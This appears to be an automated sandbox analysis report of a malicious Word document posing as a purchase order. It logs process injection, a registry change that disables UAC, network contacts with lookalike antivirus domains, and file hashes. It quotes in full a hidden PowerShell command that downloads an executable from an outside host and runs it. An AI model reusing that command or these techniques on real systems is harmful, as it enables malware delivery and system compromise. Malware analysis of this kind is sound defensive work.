Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1632 wrote to memory of 1712 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1632 wrote to memory of 1712 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1632 wrote to memory of 1712 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1632 wrote to memory of 1712 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1632 wrote to memory of 1160 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1632 wrote to memory of 1160 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1632 wrote to memory of 1160 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1632 wrote to memory of 1160 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1712 wrote to memory of 1612 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\EXCEL.exe
PID 1712 wrote to memory of 1612 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\EXCEL.exe
PID 1712 wrote to memory of 1612 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\EXCEL.exe
PID 1712 wrote to memory of 1612 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\EXCEL.exe
PID 1712 wrote to memory of 1612 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\EXCEL.exe
PID 1712 wrote to memory of 1612 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\EXCEL.exe
PID 1712 wrote to memory of 1612 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\EXCEL.exe
PID 1612 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1612 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1612 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1612 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1612 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1612 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1612 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1612 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1612 wrote to memory of 956 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1612 wrote to memory of 956 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1612 wrote to memory of 956 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1612 wrote to memory of 956 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1632 wrote to memory of 2064 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 1632 wrote to memory of 2064 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 1632 wrote to memory of 2064 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 1632 wrote to memory of 2064 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 1612 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1612 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1612 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1612 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1612 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
PID 1612 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
PID 1612 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
PID 1612 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
PID 1612 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
PID 1612 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
PID 1612 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
PID 1612 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
PID 1612 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
PID 1612 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
PID 1612 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
PID 2372 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\EXCEL.exe C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 2372 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\EXCEL.exe C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 2372 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\EXCEL.exe C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 2372 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\EXCEL.exe C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 2372 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\EXCEL.exe C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 2372 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\EXCEL.exe C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 2372 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\EXCEL.exe C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 2372 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\EXCEL.exe C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 2372 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\EXCEL.exe C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 2372 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\EXCEL.exe C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 2372 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\EXCEL.exe C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 2372 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\EXCEL.exe C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 2372 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\EXCEL.exe C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 2372 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\EXCEL.exe C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 2372 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\EXCEL.exe C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 2372 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\EXCEL.exe C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 2372 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\EXCEL.exe C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 2372 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\EXCEL.exe C:\Program Files (x86)\Internet Explorer\iexplore.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\EXCEL.exe N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\IMG_Order PO 094765 SMH.doc"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://esetnode32-antiviru.ydns.eu/EXCEL.exe','C:\Users\Admin\AppData\Roaming\EXCEL.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\EXCEL.exe'"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://esetnode32-antiviru.ydns.eu/EXCEL.exe','C:\Users\Admin\AppData\Roaming\EXCEL.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\EXCEL.exe'"

C:\Users\Admin\AppData\Roaming\EXCEL.exe

"C:\Users\Admin\AppData\Roaming\EXCEL.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.bing.com

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.facebook.com

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.twitter.com

C:\Users\Admin\AppData\Local\Temp\EXCEL.exe

C:\Users\Admin\AppData\Local\Temp\EXCEL.exe

C:\Program Files (x86)\Internet Explorer\iexplore.exe

C:\Users\Admin\AppData\Local\Temp\EXCEL.exe

C:\Program Files (x86)\Internet Explorer\iexplore.exe

C:\Users\Admin\AppData\Local\Temp\EXCEL.exe

C:\Windows\SysWOW64\notepad.exe

notepad.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 esetnode32-antiviru.ydns.eu udp
US 192.3.194.242:80 esetnode32-antiviru.ydns.eu tcp
US 192.3.194.242:80 esetnode32-antiviru.ydns.eu tcp
US 192.3.194.242:80 esetnode32-antiviru.ydns.eu tcp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 www.bing.com udp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 www.twitter.com udp
US 8.8.8.8:53 kapasky-antivirus.firewall-gateway.net udp
FR 146.59.132.186:4000 kapasky-antivirus.firewall-gateway.net tcp
FR 146.59.132.186:4000 kapasky-antivirus.firewall-gateway.net tcp
FR 146.59.132.186:4000 kapasky-antivirus.firewall-gateway.net tcp

Files

memory/1632-54-0x00000000722E1000-0x00000000722E4000-memory.dmp

memory/1632-55-0x000000006FD61000-0x000000006FD63000-memory.dmp

memory/1632-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/1632-57-0x0000000074C81000-0x0000000074C83000-memory.dmp

memory/1712-58-0x0000000000000000-mapping.dmp

memory/1160-59-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 b4df5569627eab6624eb2f76448a6d53
SHA1 bd122618f90371ba80098c1325a8aa475bc229ba
SHA256 2591c1576ea805d336c0427163ae8780cd84fdfca02206d423343a43e5924b63
SHA512 89c8ce9fe5712517dff2d388c9e6055c2d3098bf7a040d7570de4864c983e39b67cacdfee616c32e20b3f385a0b8479a6c8571c63a272eaa0a12fd3999a730a7

memory/1712-65-0x0000000002620000-0x000000000326A000-memory.dmp

memory/1712-66-0x0000000002620000-0x000000000326A000-memory.dmp

memory/1160-64-0x0000000004B70000-0x00000000050A6000-memory.dmp

memory/1712-63-0x0000000004B90000-0x00000000050C6000-memory.dmp

C:\Users\Admin\AppData\Roaming\EXCEL.exe

MD5 d8ae3cbe899a87b5222fbb894166d546
SHA1 139a8055baaf43a29849771e8403e321484ef0a2
SHA256 903d79d960ff3bf5e5aa880f9f3c067b47dedde70a76fdb43c5ef9cc9fe16804
SHA512 4f421b885c0a3e80eb12c3fe4665e365c9233bcf16cf8425e30f0b0ddd81517bfa1b1bc4445806e591b048d6bd1c4bebf23cbc3f03c8a785b9f94c7c56bf289c

\Users\Admin\AppData\Roaming\EXCEL.exe

MD5 f6200b9b9789794de4a8d78f4ae96d22
SHA1 1d18c71e7e4de5c6216653db5effba586345597c
SHA256 85f0af15d708b6a2ea67a30f2a858efc9f32af678a5633289c297f588443cd7a
SHA512 5fd2e93293bf2ebe5b68e747dbed842c2f4fcd74dce883ffa7daa6daf647e41f4b1926fdf2f05048b3024609ef6805fb2a6b501c92335ab37098dfb6d4defa72

memory/1612-69-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\EXCEL.exe

MD5 f6200b9b9789794de4a8d78f4ae96d22
SHA1 1d18c71e7e4de5c6216653db5effba586345597c
SHA256 85f0af15d708b6a2ea67a30f2a858efc9f32af678a5633289c297f588443cd7a
SHA512 5fd2e93293bf2ebe5b68e747dbed842c2f4fcd74dce883ffa7daa6daf647e41f4b1926fdf2f05048b3024609ef6805fb2a6b501c92335ab37098dfb6d4defa72

C:\Users\Admin\AppData\Roaming\EXCEL.exe

MD5 f6200b9b9789794de4a8d78f4ae96d22
SHA1 1d18c71e7e4de5c6216653db5effba586345597c
SHA256 85f0af15d708b6a2ea67a30f2a858efc9f32af678a5633289c297f588443cd7a
SHA512 5fd2e93293bf2ebe5b68e747dbed842c2f4fcd74dce883ffa7daa6daf647e41f4b1926fdf2f05048b3024609ef6805fb2a6b501c92335ab37098dfb6d4defa72

memory/1612-72-0x0000000000DB0000-0x0000000000DB1000-memory.dmp

memory/1612-74-0x0000000002270000-0x0000000002271000-memory.dmp

memory/1560-76-0x0000000000000000-mapping.dmp

memory/1972-75-0x0000000000000000-mapping.dmp

memory/956-77-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 b4df5569627eab6624eb2f76448a6d53
SHA1 bd122618f90371ba80098c1325a8aa475bc229ba
SHA256 2591c1576ea805d336c0427163ae8780cd84fdfca02206d423343a43e5924b63
SHA512 89c8ce9fe5712517dff2d388c9e6055c2d3098bf7a040d7570de4864c983e39b67cacdfee616c32e20b3f385a0b8479a6c8571c63a272eaa0a12fd3999a730a7

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 b4df5569627eab6624eb2f76448a6d53
SHA1 bd122618f90371ba80098c1325a8aa475bc229ba
SHA256 2591c1576ea805d336c0427163ae8780cd84fdfca02206d423343a43e5924b63
SHA512 89c8ce9fe5712517dff2d388c9e6055c2d3098bf7a040d7570de4864c983e39b67cacdfee616c32e20b3f385a0b8479a6c8571c63a272eaa0a12fd3999a730a7

memory/1560-84-0x0000000002450000-0x0000000002451000-memory.dmp

memory/956-85-0x0000000001D90000-0x0000000001D91000-memory.dmp

memory/1560-86-0x0000000002451000-0x0000000002452000-memory.dmp

memory/1972-87-0x0000000002460000-0x00000000030AA000-memory.dmp

memory/1560-88-0x0000000002452000-0x0000000002454000-memory.dmp

memory/1972-89-0x0000000002460000-0x00000000030AA000-memory.dmp

memory/956-91-0x0000000001D92000-0x0000000001D94000-memory.dmp

memory/956-90-0x0000000001D91000-0x0000000001D92000-memory.dmp

memory/1972-92-0x0000000002460000-0x00000000030AA000-memory.dmp

memory/2064-93-0x0000000000000000-mapping.dmp

memory/2064-97-0x000007FEFB7F1000-0x000007FEFB7F3000-memory.dmp

memory/1560-94-0x0000000005E80000-0x0000000005F71000-memory.dmp

memory/1972-95-0x0000000005F10000-0x0000000006001000-memory.dmp

memory/956-96-0x0000000005D80000-0x0000000005E71000-memory.dmp

memory/2172-98-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 b4df5569627eab6624eb2f76448a6d53
SHA1 bd122618f90371ba80098c1325a8aa475bc229ba
SHA256 2591c1576ea805d336c0427163ae8780cd84fdfca02206d423343a43e5924b63
SHA512 89c8ce9fe5712517dff2d388c9e6055c2d3098bf7a040d7570de4864c983e39b67cacdfee616c32e20b3f385a0b8479a6c8571c63a272eaa0a12fd3999a730a7

memory/1612-101-0x0000000004E10000-0x0000000004E56000-memory.dmp

memory/1612-102-0x0000000000B20000-0x0000000000B50000-memory.dmp

\Users\Admin\AppData\Local\Temp\EXCEL.exe

MD5 f6200b9b9789794de4a8d78f4ae96d22
SHA1 1d18c71e7e4de5c6216653db5effba586345597c
SHA256 85f0af15d708b6a2ea67a30f2a858efc9f32af678a5633289c297f588443cd7a
SHA512 5fd2e93293bf2ebe5b68e747dbed842c2f4fcd74dce883ffa7daa6daf647e41f4b1926fdf2f05048b3024609ef6805fb2a6b501c92335ab37098dfb6d4defa72

memory/2372-105-0x00000000004010B8-mapping.dmp

memory/2372-104-0x0000000000400000-0x000000000042C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\EXCEL.exe

MD5 f6200b9b9789794de4a8d78f4ae96d22
SHA1 1d18c71e7e4de5c6216653db5effba586345597c
SHA256 85f0af15d708b6a2ea67a30f2a858efc9f32af678a5633289c297f588443cd7a
SHA512 5fd2e93293bf2ebe5b68e747dbed842c2f4fcd74dce883ffa7daa6daf647e41f4b1926fdf2f05048b3024609ef6805fb2a6b501c92335ab37098dfb6d4defa72

C:\Users\Admin\AppData\Local\Temp\EXCEL.exe

MD5 f6200b9b9789794de4a8d78f4ae96d22
SHA1 1d18c71e7e4de5c6216653db5effba586345597c
SHA256 85f0af15d708b6a2ea67a30f2a858efc9f32af678a5633289c297f588443cd7a
SHA512 5fd2e93293bf2ebe5b68e747dbed842c2f4fcd74dce883ffa7daa6daf647e41f4b1926fdf2f05048b3024609ef6805fb2a6b501c92335ab37098dfb6d4defa72

memory/2416-111-0x0000000000401364-mapping.dmp

memory/2432-112-0x0000000000400000-0x0000000000443000-memory.dmp

memory/2432-113-0x0000000000401364-mapping.dmp

memory/2432-114-0x0000000000590000-0x00000000006E3000-memory.dmp

memory/2464-117-0x0000000000000000-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2021-09-20 11:40

Reported

2021-09-20 11:42

Platform

win10v20210408

Max time kernel

150s

Max time network

152s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\IMG_Order PO 094765 SMH.doc" /o ""

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process N/A C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\FLTLDR.EXE C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Modifies registry class

Description Indicator Process Target
Key created \Registry\User\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-1982692896-3042838041-473469356-1040697758-2606466529-2719151250-1045455430\Children C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key created \Registry\User\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\oice_16_974fa576_32c1d314_2c4d C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key deleted \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-1982692896-3042838041-473469356-1040697758-2606466529-2719151250-1045455430 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-1982692896-3042838041-473469356-1040697758-2606466529-2719151250-1045455430\DisplayName = "OICE_16_974FA576_32C1D314_2C4D" C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
